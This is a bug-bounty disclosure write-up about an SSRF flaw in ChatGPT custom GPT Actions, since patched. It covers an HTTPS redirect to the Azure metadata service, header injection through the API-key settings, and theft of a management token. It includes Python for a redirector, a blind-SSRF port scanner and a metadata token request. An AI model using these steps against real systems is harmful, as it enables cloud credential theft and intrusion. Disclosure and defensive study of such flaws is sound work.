In cybersecurity, you begin to develop a kind of hacker mindset or “sixth sense”. You start seeing the world not just for what it does, but for what it could do. So, when I was building my first custom GPT in ChatGPT and got to the “Actions” section, that sense started tingling! I wasn’t even on a bug hunt, just curious about the custom GPT feature and building a custom assistant. The goal was to have a GPT pull data from my own external API, but once I realized this feature was returning data from a user-provided URL, alarm bells went off and the hacker instinct took over, telling me to check for SSRF.
Server-Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to trick a server-side application into making requests to an unexpected destination. If user-provided URLs are not properly validated, an attacker can misuse the server’s own privileged access to reach internal network resources or cloud metadata services. SSRF is one of those vulnerabilities that perfectly shows the gap between how developers think a system will be used and how it can be used.
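To make that concrete, here’s a minimal sketch of the vulnerable pattern in Python (the /preview endpoint and its parameter are hypothetical, not taken from any real product): the server fetches whatever URL the user supplies and hands the body straight back.

```python
# Minimal sketch of the classic SSRF-vulnerable pattern (a hypothetical
# /preview endpoint, not code from any real product): the server fetches
# whatever URL the user supplies and returns the body.
import requests
from flask import Flask, request

app = Flask(__name__)

@app.route("/preview")
def preview():
    url = request.args.get("url", "")
    # No validation: "url" could just as easily be http://169.254.169.254/...
    # or any internal address that only the server can reach.
    resp = requests.get(url, timeout=5)
    return resp.text  # full-read SSRF: the body goes straight back to the user

if __name__ == "__main__":
    app.run()
```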
As modern web and AI applications have added convenient features like URL previews, SSRF has become increasingly common, appearing in the OWASP Top 10 list for the first time in 2021. The migration from on-premises services to cloud technologies has also significantly increased the potential blast radius of this bug family, due to the insecure default configurations within many cloud providers.
The basic impact of SSRF is simple: it lets an attacker cause the server to make network requests the attacker cannot make directly. Any real danger comes from what the server itself can reach. There are two types of SSRF: full-read and blind. In a full-read SSRF, the attacker directly receives the target service’s response data, making it simple to exfiltrate data from internal services. A blind SSRF doesn’t return the target’s response, but it is still dangerous: the attacker can interact with internal services and use techniques such as port scanning via response times to determine which ports are open. In the past, I escalated a fully blind SSRF in Yahoo Mail to remote command execution by using the gopher protocol to interact with an internal Redis service.
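Even with no response body, timing alone leaks information. Here’s a rough sketch of the port-scanning idea (the vulnerable endpoint and internal host below are made up for illustration):

```python
# Rough sketch of port scanning through a blind SSRF using response times.
# The vulnerable endpoint and internal host here are hypothetical.
import time
import requests

VULN_ENDPOINT = "https://target.example/fetch"  # blind SSRF: no body comes back

for port in (22, 80, 443, 6379):
    start = time.monotonic()
    try:
        requests.get(VULN_ENDPOINT, params={"url": f"http://10.0.0.5:{port}/"}, timeout=15)
    except requests.Timeout:
        pass  # a very slow response is itself a signal (likely filtered)
    elapsed = time.monotonic() - start
    # Closed ports tend to fail fast (connection refused), while open or
    # filtered ports respond more slowly; the deltas map out the network.
    print(f"port {port}: {elapsed:.2f}s")
```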
In cloud environments, the impact of a full-read SSRF is typically critical because all major cloud providers (AWS, Azure, GCP) rely on an internal metadata service for their compute nodes to function properly. Accessible at the link-local URL http://169.254.169.254, it’s a private API that only the machine itself can query, and it holds the essential information about the machine’s own environment: its name, network details, and its access credentials.
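If you’re on an Azure VM, you can query the IMDS yourself via the documented instance endpoint, along these lines:

```python
# Query the Azure Instance Metadata Service from an Azure VM.
# 169.254.169.254 is link-local, so this only works from the machine itself.
import requests

resp = requests.get(
    "http://169.254.169.254/metadata/instance",
    params={"api-version": "2021-02-01"},
    headers={"Metadata": "true"},  # Azure requires this header (more on that shortly)
    timeout=2,
)
print(resp.json())  # instance name, network details, and more
```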
This is legitimate functionality, but it can allow an attacker to pivot a simple SSRF into a complete compromise of the cloud environment, depending on the access assigned to the IMDS identities. In fact, at Open Security, we’ve used this exact attack chain on many penetration tests, including one in which we fully compromised the cloud environment of a major global financial firm by exploiting an SSRF in an invoice generation feature to execute code on almost 200 EC2 instances. But how does all of this relate to ChatGPT? Well, let’s dive into a quick breakdown of the vulnerable feature I exploited to gain access to ChatGPT’s Azure IMDS identity, enabling me to access their cloud API directly.
To understand the vulnerability, you first need to understand how custom GPTs work in ChatGPT. A custom GPT (a ChatGPT Plus feature) is a specialized version of ChatGPT configured with your own instructions, knowledge, and capabilities. For basic usage, you write the bot’s system instructions, name it, add example prompts, and optionally upload documents for it to use as knowledge. There are various features like web browsing and image generation, but the most interesting to me was the “Actions” section, which lets you define external APIs the GPT can call by providing an OpenAPI schema. Whenever the model decides an action is needed, it submits a request to the API and uses the result in its reply.
Let’s quickly dive into this feature so you can understand how we are going to trigger the vulnerability. A basic API action added to a GPT is shown below: an API that provides the temperature at a location is given to ChatGPT so it can look up the weather when a user asks for it.
[Screenshot: a weather API action configured in the custom GPT editor]
The feature accepts an OpenAPI schema, which tells the GPT how to interact with the API. The Test button under available actions can be used to submit a test request to the API and view its response data. There is also an authentication section, which allows us to set API keys and authentication headers for the request.
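To give a feel for the format, here’s roughly what a minimal schema for the weather example might look like, built as a Python dict and serialized to JSON (the editor accepts OpenAPI as JSON or YAML; the server URL and operation names here are invented for illustration):

```python
# A minimal OpenAPI schema for the weather example above. The server URL
# and operation names are made up; only the overall shape matters here.
import json

schema = {
    "openapi": "3.1.0",
    "info": {"title": "Weather API", "version": "1.0.0"},
    "servers": [{"url": "https://weather.example.com"}],  # the GPT sends requests here
    "paths": {
        "/temperature": {
            "get": {
                "operationId": "getTemperature",
                "summary": "Get the current temperature for a location",
                "parameters": [{
                    "name": "location",
                    "in": "query",
                    "required": True,
                    "schema": {"type": "string"},
                }],
                "responses": {"200": {"description": "Current temperature"}},
            }
        }
    },
}
print(json.dumps(schema, indent=2))
```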
My idea for SSRF was simple: create an action with the API URL pointed at an internal service, like the metadata service, and attempt to extract an API access token for the cloud environment. Sadly, my first attempt at SSRF against the metadata service failed (as is common in hacking), because only HTTPS URLs were allowed in the API specification, and the IMDS is only accessible via an HTTP URL.
To get around this error, I used Mr. Ol’ Reliable, 302 redirects (shout out to https://ssrf.cvssadvisor.com/ for an awesome tool by the way. This service is similar to Burp Collaborator and Interactsh, but actually allows you to customize the server response, making it very simple to test various SSRF bypasses like redirection).
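If you’d rather self-host the trick than use that service, a few lines of Python reproduce it. This is just a sketch; in practice it would need to sit behind a domain with a valid TLS certificate, since the schema only accepts HTTPS URLs:

```python
# Minimal self-hosted version of the redirect trick: answer every request
# with a 302 pointing at the Azure IMDS. In practice this must be served
# over HTTPS (e.g. behind a TLS-terminating proxy), since the Actions
# schema only accepts HTTPS URLs.
from http.server import BaseHTTPRequestHandler, HTTPServer

class Redirector(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header(
            "Location",
            "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
        )
        self.end_headers()

HTTPServer(("0.0.0.0", 8080), Redirector).serve_forever()
```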
Now, if I place my redirection URL in the API spec, it will be allowed since it is HTTPS, but when the GPT accesses the API, the redirect should be followed to http://169.254.169.254. Sure enough, it worked!
Since the server followed 302 redirects, it returned the response from their internal metadata URL. Mission accomplished, right? Wrong. The response from the metadata service indicated that a required header was not being set (this is an Azure-specific requirement; different clouds require different headers to access their metadata URLs, providing varying levels of SSRF protection):
[Screenshot: Azure IMDS error response indicating the required Metadata header was missing]
Azure IMDS requires the Metadata: True header to be set on every request; without the ability to set this header, I couldn’t retrieve anything. At first, I tried setting the header directly through the OpenAPI spec, but that resulted in an error because custom headers were not allowed:
[Screenshot: error returned when attempting to define custom headers in the OpenAPI spec]
Although this didn’t work, I eventually realized I might be able to set custom headers through the authentication settings. They allowed me to define a custom API key, so I created one named Metadata and set its value to True.
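Conceptually, an Actions backend that supports an API key in a custom header has to do something like the following, which is why naming the key Metadata with value True is equivalent to injecting an arbitrary header (an illustration of the idea, not OpenAI’s actual code):

```python
# Sketch of why the auth settings amount to arbitrary header injection
# (an illustration of the idea, not OpenAI's actual code). With a
# "custom header" API key, the backend attaches {header_name: key_value}
# to every action request, so an API key named "Metadata" with the value
# "True" produces exactly the header Azure IMDS demands.
import requests

def call_action(url: str, api_key_header: str, api_key_value: str):
    headers = {api_key_header: api_key_value}  # attacker controls both parts
    return requests.get(url, headers=headers, timeout=5)

# call_action("https://attacker-redirector.example/", "Metadata", "True")
# follows the 302 and carries "Metadata: True" along to 169.254.169.254.
```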
I submitted the request again, and it worked! The proper header was set, and I was presented with the response data from their internal metadata URL! Since I could now read content from their metadata URL, I generated an Azure management API access token via http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com/&api-version=2025-04-07
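For reference, here’s what that final request amounts to when replayed from inside an Azure environment (the identity endpoint is documented by Azure; the commented-out management call is just an illustration of how the token would be used):

```python
# What the final SSRF request amounts to: asking the Azure IMDS identity
# endpoint for a management-plane access token. This only runs from a
# machine inside the Azure environment.
import requests

resp = requests.get(
    "http://169.254.169.254/metadata/identity/oauth2/token",
    params={
        "resource": "https://management.azure.com/",
        "api-version": "2025-04-07",
    },
    headers={"Metadata": "True"},
    timeout=2,
)
token = resp.json()["access_token"]

# The token can then be used directly against the Azure management API, e.g.:
# requests.get(
#     "https://management.azure.com/subscriptions?api-version=2020-01-01",
#     headers={"Authorization": f"Bearer {token}"},
# )
```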
I confirmed the token was valid and then immediately reported the issue to OpenAI’s bug bounty program on Bugcrowd. While this access to the Azure cloud environment behind custom GPTs was not the most severe we’ve ever seen (RCE on almost 200 EC2 instances takes that cake), OpenAI still rated it as a High severity finding and patched it almost immediately! It was an awesome experience to go from spidey-tingle to exploiting a hugely popular service with only a few hours of work. On to the next bug!